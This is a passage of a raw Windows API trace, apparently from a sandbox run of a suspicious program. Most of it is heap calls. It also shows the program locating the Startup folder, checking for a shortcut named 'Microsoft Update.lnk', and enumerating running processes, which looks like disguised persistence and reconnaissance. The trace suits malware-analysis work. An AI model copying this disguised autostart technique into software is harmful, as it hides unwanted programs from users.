lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0282.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0282.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0282.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0282.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0282.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0282.220] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0282.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0282.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0282.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0282.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0282.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0282.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0282.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0282.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0282.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0282.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0282.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0282.221] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0282.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0282.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0282.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0282.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0282.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0282.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0282.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0282.221] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0282.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0282.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0282.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0282.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0282.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0282.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0282.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0282.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0282.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0282.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0282.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0282.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0282.223] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0282.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0282.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0282.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0282.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0282.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0282.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0282.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0282.224] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0282.224] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0282.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0282.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0282.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0282.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0282.225] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0282.227] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.228] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.229] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.230] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.231] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.231] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.232] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0282.233] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0282.234] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0282.235] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0282.246] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.247] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.247] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.248] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.249] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.250] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0282.251] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.252] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.276] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0282.277] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0282.278] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0282.279] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0282.288] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.289] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0282.290] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0282.291] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0282.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0282.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0282.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0282.306] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0282.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0282.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0282.308] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0282.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0282.310] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0282.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0282.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0282.313] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0282.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0282.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0282.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0282.316] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0282.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.324] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0282.325] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.327] Process32NextW (in: hSnapshot=0x294, 